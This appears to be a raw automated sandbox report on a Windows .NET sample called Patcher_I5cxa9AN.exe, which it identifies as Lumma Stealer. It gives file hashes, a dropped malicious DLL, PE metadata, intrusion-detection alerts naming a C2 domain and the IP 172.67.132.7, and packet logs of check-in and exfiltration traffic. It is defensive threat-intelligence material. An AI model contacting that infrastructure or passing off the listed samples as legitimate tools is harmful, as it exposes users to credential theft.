                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.132.7
                                                                                            CrosshairX.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.132.7
                                                                                            installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.132.7
                                                                                            Installer_x64.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.132.7
                                                                                            Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 172.67.132.7
                                                                                            Insomia.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.132.7
                                                                                            Aura.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 172.67.132.7
                                                                                            loader.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 172.67.132.7
                                                                                            Script.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 172.67.132.7
                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.132.7
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):42
                                                                                            Entropy (8bit):4.0050635535766075
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                            Process:C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):431616
                                                                                            Entropy (8bit):7.0490991148842905
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:e9WCMiFBtleC8gViMGr4qBkQrpFq4l5t:SFtwgcMXUHq4b
                                                                                            MD5:9A662A61F1EF199CCAFD4363B4964B2D
                                                                                            SHA1:4FE678EC35B5EFAA9481CB3DC69A66390DADA7C2
                                                                                            SHA-256:D4459904722D68BCAE78B2C5DBCA9621CF547A155245ECE1EA6A23D5913EACB7
                                                                                            SHA-512:085A4203B691BB62A3EA4049FE6C8CCC59E213EB4A3BE8A04501A81B504F9C3A7B32EEEF9CE28DDE6317A1C3981C812F229CB3E15893B953769F3B251B48DC24
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Reputation:low
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L...-.[.-.[.-.[.U.Z.-.[.U.Z.-.[.U.Z.-.[.U.Z.-.[..[.-.[.-.[.-.[.X.Z.-.[.X.Z.-.[.X.Z.-.[.-.[.-.[VX.Z.-.[VX.Z.-.[Rich.-.[........PE..L...t.zg...........!..... ...|......Nt.......0............................................@.............................|.......P...................................<~..............................X~..@............0..X............................text............ .................. ..`.rdata...a...0...b...$..............@..@.data...4...........................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.012361487840769
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:Patcher_I5cxa9AN.exe
                                                                                            File size:493'568 bytes
                                                                                            MD5:f23b6bce35ed7e7fd538a426defd13b8
                                                                                            SHA1:242506b0ef3ece7276a10ecafa756c72c28b3366
                                                                                            SHA256:d181f3391f059ff37e887fd3e5055e83bc45d2f3ea744e37113564352948facb
                                                                                            SHA512:3a45f9b785715df816686731968c295748f488896a93e9c1e2a7d26cf4b33e778735edc74821dd5d13ed6aa9b222f59c66cf72a2e79e6370cf44010e41396c1e
                                                                                            SSDEEP:12288:Hmx08SHGoAYBTQB5zr1KcpiFCALt7PYNZPPs:QR+GoAYB25n1v2C
                                                                                            TLSH:E2A48D48F65372AEC787803466EA2F3F9AF425214326CD87D247C68D592A9D3CE37913
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.zg..............0..|..........^.... ........@.. ....................................@................................
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x479a5e
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows cui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x677ADE76 [Sun Jan 5 19:33:10 2025 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x79a0c0x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x64e.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x77a640x77c00bca78be9850336d7fb5d32e1a56d5768False0.5270338596033403data7.023884578280009IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x7a0000x64e0x80007c52749c66929df783ef7ae7fa927eaFalse0.35791015625data3.5788490074606556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x7c0000xc0x2003abe8ee67eb618a13e34bf77417c1da5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_VERSION0x7a0a00x3c4data0.4387966804979253
                                                                                            RT_MANIFEST0x7a4640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-05T20:41:54.045515+01002058638ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click)1192.168.2.4591941.1.1.153UDP
                                                                                            2025-01-05T20:41:54.551050+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449730172.67.132.7443TCP
                                                                                            2025-01-05T20:41:54.551050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.132.7443TCP
                                                                                            2025-01-05T20:41:55.054770+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.132.7443TCP
                                                                                            2025-01-05T20:41:55.054770+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.132.7443TCP
                                                                                            2025-01-05T20:41:55.553164+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449731172.67.132.7443TCP
                                                                                            2025-01-05T20:41:55.553164+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.132.7443TCP
                                                                                            2025-01-05T20:41:56.119480+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.132.7443TCP
                                                                                            2025-01-05T20:41:56.119480+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.132.7443TCP
                                                                                            2025-01-05T20:41:56.848103+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449732172.67.132.7443TCP
                                                                                            2025-01-05T20:41:56.848103+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.132.7443TCP
                                                                                            2025-01-05T20:41:57.831328+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732172.67.132.7443TCP
                                                                                            2025-01-05T20:41:58.395309+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449733172.67.132.7443TCP
                                                                                            2025-01-05T20:41:58.395309+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.132.7443TCP
                                                                                            2025-01-05T20:41:59.616908+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449734172.67.132.7443TCP
                                                                                            2025-01-05T20:41:59.616908+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.132.7443TCP
                                                                                            2025-01-05T20:42:00.966408+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449735172.67.132.7443TCP
                                                                                            2025-01-05T20:42:00.966408+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.132.7443TCP
                                                                                            2025-01-05T20:42:02.614994+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449736172.67.132.7443TCP
                                                                                            2025-01-05T20:42:02.614994+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.132.7443TCP
                                                                                            2025-01-05T20:42:06.017940+01002058639ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)1192.168.2.449737172.67.132.7443TCP
                                                                                            2025-01-05T20:42:06.017940+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.132.7443TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 5, 2025 20:41:54.063147068 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:54.063188076 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:54.063281059 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:54.066312075 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:54.066323042 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:54.550913095 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:54.551049948 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:54.578629971 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:54.578643084 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:54.578856945 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:54.624974966 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:54.625005960 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:54.625051022 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.054770947 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.054869890 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.054924011 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.057255030 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.057270050 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.057282925 CET49730443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.057287931 CET44349730172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.077373981 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.077414036 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.077476025 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.077816963 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.077832937 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.553090096 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.553164005 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.613792896 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.613832951 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.614029884 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:55.648071051 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.648089886 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:55.648135900 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.119469881 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.119725943 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.119776011 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.119796991 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.119920969 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.119966984 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.119973898 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.120192051 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.120235920 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.120243073 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.124242067 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.124269009 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.124285936 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.124294043 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.124320030 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.124337912 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.124346018 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.124382019 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.224291086 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.224389076 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.224411964 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.224440098 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.224457026 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.224478006 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.224494934 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.224519968 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.225435019 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.225447893 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.225457907 CET49731443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.225466967 CET44349731172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.385742903 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.385773897 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.385852098 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.386162996 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.386176109 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.848005056 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.848103046 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.849378109 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.849387884 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.849591017 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.850737095 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.850882053 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.850914001 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:56.851022005 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:56.851028919 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:57.831337929 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:57.831439018 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:57.831497908 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:57.831702948 CET49732443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:57.831727028 CET44349732172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:57.909574032 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:57.909611940 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:57.909698963 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:57.910022974 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:57.910034895 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:58.395200014 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:58.395308971 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:58.396836042 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:58.396842957 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:58.397041082 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:58.398166895 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:58.398339033 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:58.398364067 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:58.887274981 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:58.887367010 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:58.887430906 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:58.889831066 CET49733443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:58.889852047 CET44349733172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:59.149022102 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.149070024 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:59.149147987 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.149590969 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.149605989 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:59.616811037 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:59.616908073 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.618304968 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.618315935 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:59.618520021 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:59.619728088 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.619878054 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.619929075 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:41:59.619993925 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:41:59.620002985 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.248466015 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.248702049 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.248770952 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.248847008 CET49734443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.248864889 CET44349734172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.485018015 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.485054016 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.485124111 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.485449076 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.485461950 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.966226101 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.966408014 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.967830896 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.967839003 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.968035936 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:00.969166040 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.969252110 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:00.969255924 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:01.433480978 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:01.433556080 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:01.433608055 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:01.437033892 CET49735443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:01.437042952 CET44349735172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.136430979 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.136461973 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.136549950 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.136873007 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.136883974 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.614907026 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.614994049 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.616370916 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.616378069 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.616585016 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.618048906 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.618891954 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.618921041 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.619241953 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.619286060 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.619416952 CET49736443192.168.2.4172.67.132.7
